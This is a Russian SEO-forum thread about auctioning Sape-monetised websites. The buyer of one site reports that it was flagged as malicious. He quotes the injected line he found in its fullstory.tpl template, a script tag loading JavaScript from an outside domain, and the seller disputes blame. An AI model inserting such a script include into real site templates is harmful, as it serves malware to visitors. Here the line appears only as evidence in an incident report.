2 сайта. Тиц 10-30 PR 3-4 доход - сапа!

123
zero tolerance
На сайте с 18.02.2010
130
Bаbai:
Аккуратнее, мошенник рядом, убедитесь что именно вы общаетесь с продавцом.
В репу прилетело: anonymous (+) /zero tolerance/ на счет покупки второго лота напишите мне в icq 122351636 или скайп papa20131

Спасибо за предупреждение.

Хотелось бы напомнить. Я работаю строго через гаранта, отписываю в ЛС свои контакты и пока не определится победитель никому не пишу с просьбой что то срочно у меня купить!!!

Соблюдайте осторожность, не ведитесь на халяву!!!

E
На сайте с 01.10.2011
27

Лот № 2 - Блиц

---------- Добавлено 03.06.2012 в 14:00 ----------

Как я понимаю, проект в Сапе прилагается к лоту.

zero tolerance
На сайте с 18.02.2010
130
eastern:
Лот № 2 - Блиц

Принято, отписал Вам в ЛС.

P.S. Да естественно проект передается в сапе на Ваш аккаунт.

zero tolerance
На сайте с 18.02.2010
130

Определился по блицу на первый лот.

Лот №1 Блиц - 25.000р

Делаем ставки господа ☝ Сайту есть куда расти, куча свободных мест.

png 78787878.png
E
На сайте с 01.10.2011
27

Лот № 2 - передачу домена, сайта и проекта в Сапе произвели успешно, совместными усилиями, несмотря на некоторые технические трудности, которые были успешно преодолены.

Особо хочу поблагодарить garant.pro за помощь в технических и юридических и организационных вопросах.

E
На сайте с 01.10.2011
27

К моему большому сожалению события, произошедшие после покупки мною сайта, весьма нерадостные. Привожу только факты, выводы прошу делать самостоятельно.

1. Через месяц с небольшим обнулился ТиЦ.

2. Пытаясь понять причины, я начал подробно изучать контент сайта. Через два с половиной месяца после покупки я случайно заметил на сайте вредоносный симптом. Вместо ссылок на файлообменники типа letitbit подставлялась ссылка на сайт, который "обругивал" Firefox.

3. Через неделю после того, как я обнаружил код, Яндекс занес сайт в список вредоносных, в результате чего сайт был забанен в Сапе.

4. Пытаясь найти причину заражения, я восстановил сайт несколько раз со всех имеющихся у меня бекапов, но вредоносный эффект не исчезал. Не помогло и восстановление сайта с бекапа, полученного мною у продавца.

5. Я обратился к продавцу с просьбой предоставить мне незараженный архив (это в предположении, что сайт был испорчен уже у меня. Продавец мне ответил категорическим отказом.

6. Путем небольших усилий вредоносный код удалось найти. В шаблоне fullstory.tpl вместо текста

<script type="text/javascript" src="http://code.jquery.com/jquery-latest.js"></script>

<div class="post odd" style="background-color:#f6fdd6">

находился текст

<script type="text/javascript" src="http://code.jquery.com/jquery-latest.js"></script>

<script type="text/javascript" src="http://zlovoploti.ru/script.js"></script>
<div class="post odd" style="background-color:#f6fdd6">

Мог ли архив сайта быть заражен у меня в системе Linux с учетом того, что при получении я немедленно сделал бекап этого архива на CD, пусть решает общественность форума.

N1
На сайте с 19.01.2008
119
eastern:
Мог ли архив сайта быть заражен у меня в системе Linux с учетом того, что при получении я немедленно сделал бекап этого архива на CD, пусть решает общественность форума.

Общественность вам здесь не поможет. Всем известно, что после покупки нужно очень хорошо проверять сайт. Так что увы...

SAPE.RU (http://www.sape.ru/r.sdVzMNtnkG.php) - своих рефералов всегда консультирую...
E
На сайте с 01.10.2011
27
'nalim[1nc:
;10787714']Общественность вам здесь не поможет. Так что увы...

Был не совсем верно понят, поэтому поясню. Мотивом моего предыдущего поста не было желание получить от кого-либо помощь. Исключительно из гуманитарных соображений информирую тех, кто мог бы в будущем попасть в аналогичную ситуацию в сделке с топикстартером.

'nalim[1nc:
;10787714']Всем известно, что после покупки нужно очень хорошо проверять сайт.

Не у каждого хватает на это квалификации/времени/магической энергии. А по существу, не спорю, сам виноват. Но это не значит, что подобные действия ТС надо замалчивать.

Zexh
На сайте с 04.09.2002
398

ТС временно отключен, я просто передаю его слова цитатой:

zero tolerance:

Во первых архив был чистый, сайт был на сервере где более 200 сайтов и все они прекрасно работают.

Второе проверял он его двое суток и все было нормально.

Третье самое главное его вранье по поводу что я категорически отказался дать ему архив когда оно постучало спустя 3 месяца - я не храню архивы проданных сайтов, и уверен что их никто не хранит у меня просто нет!

---------- Добавлено 29.08.2012 в 12:13 ----------

теперь от себя:

1. помню этот случай сделки, случай был непростой именно в силу сложности взаимоотношений покупатели я продавца, а не что товар какой-то проблемный

2. я не могу сейчас говорить и утверждать что-то именно по сайту, потому что у меня его никогда не было, но...

- есть факторы, которые непредсказуемые в принципе - колебания всегда и везде

- есть фактор времени, то есть через много времени что там произошло и почему...

- кроме того, когда сайт достаточно долгое время находится у покупателя, а у продавца уже НЕТ доступа, то было бы странно говорить о том, что продавец что-то там меняет специально во вред. данные действия может совершать кто угодно, взломав или найдя брешь в сайте.

- вечных гарантий на что-то никто не дает в силу выше описанных и многих других факторов, а покупатель всегда оценивает и закладывает риски в покупку. такой бизнес

---------- Добавлено 29.08.2012 в 12:23 ----------

по ТС могу сказать, что было проведено много сделок, жалоб нет со стороны покупателей, ниодной

Garant.PRO (/ru/forum/835207): аттестат, аккаунт 2002г, BL->1250+ гарант сделок в интернете (http://Garant.PRO/).
E
На сайте с 01.10.2011
27

В отличие от ТС я утверждаю только то, что есть, а не то, что было или не было.

"Архив был чистый" - даже если это и было так, то проверить это сейчас нельзя, независимо от причин, по которой ТС удалил архив. (Я бы не удалял, но это уже сейчас не важно).

"Архив заражен" - я утверждаю это ответственно, поскольку он действительно заражен. Если предположить, что уто-то получил доступ к моему офису, подменил CD-диск с архивом, то в заражении файла виноват я. И еще можно предположить, что вредоносный код успели записать за те 10 минут, пока скачанный мною файл находился у меня на HD-диске перед записью на CD. Предположений может быть много, но факт, как говорится, налицо.

2 Zexh: Хотел бы Вас поправить, что дело не в сложности взаимоотношений, ведь тут же не коммунальная квартира, типа "кто рассыпал сахар в коридоре?". Хочу Вам напомнить, что при покупке сайта я хотел аннулировать сделку в связи с категорическим отказом ТС сотрудничать по техническим вопросам. Да, формально ТС не обещал это делать. Но по-человечески мне это непонятно, поэтому я тогда и заподозрил неладное. Вижу - я.как в воду глядел.

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий